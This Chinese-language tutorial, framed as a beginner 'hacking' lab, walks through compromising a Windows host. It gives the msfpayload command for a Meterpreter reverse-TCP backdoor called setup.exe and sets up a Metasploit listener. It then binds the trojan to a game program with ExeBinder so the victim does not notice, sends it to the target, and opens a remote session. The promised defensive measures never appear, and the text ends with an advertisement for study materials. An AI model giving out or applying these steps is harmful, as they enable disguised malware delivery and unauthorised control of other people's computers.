一文带你如何用Kali渗透Windows服务器,黑客技术零基础入门到精通实战教程 这个实验主要让我们学习漏洞扫描技术基本原理了解其在网络攻防中的作用掌握使用Kali中的Metasploit对目标主机渗透并根据报告做出相应的防护措施。实战步骤一本实验通过利用kali进行漏洞扫描使用Metasploit对目标主机进行渗透测试并根据报告做出相应的防护措施共分为3个实验步骤详情如下1、 实战步骤一生成setup.exe后门程序即木马程序。1 打开kali终端输入ifconfig 得到本机ip为192.168.189.130。如下图2输入以下命令使用msfpayload生成名为setup的后门程序msfpayload windows/meterpreter/reverse_tcp LHOST192.168.189.130 x setup.exe 如下图3 进入setup.exe所在目录修改属性选择“允许以程序执行文件”。如下图所示4 终端中输入首先msfconsole然后输入use exploit/multi/handler来加载 exploit/multi/handler 模块输入set LHOST 192.168.189.130来设置本地主机然后输入exploit -z -j开始监听如下图所示实战步骤二将上面生成的木马程序与某个软件进行捆绑。1可以在windows系统下使用exe捆绑软件将setup.exe和一个其他的某个安全软件合并为一个软件这样在运行软件时两个软件同时运行不会引起注意。在tools里面进入名为exekunbang的文件先打开ExeBinder.exe捆绑软件。选择第一个要合并的软件默认选择本软件中自带的小游戏程序点击下一步选择第二个要捆绑的软件即之前生成的木马程序setup.exe点击下一步选择一个文件要保存的路径:继续点击下一步开始捆绑软件:(2) 将捆绑后的软件发送给目标主机。实战步骤三检测目标主机对目标主机进行渗透测试。2 目标主机执行程序后在kali终端中的检测程序会及时检测到。在检测到目标主机运行程序后后门程序会反向连接到msf之后msf发起第二次攻击开始渗透然后客户端后门程序连接到服务端msf。输入sessionss可以看到目标主机的ip为192.168.189.1292再继续输入sessions -i 1,之后可以对目标主机进行一系列的操作。如输入sysinfo可知道目标主机的系统信息输入 getuid查看对方正在运行的用户。要养成多思考多总结的习惯对实验结果多去分析这样回收获更多。比如如何利用kali进行漏洞扫描如何使用Metasploit对目标主机进行渗透测试这些都是这次实战后可以去思考的。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取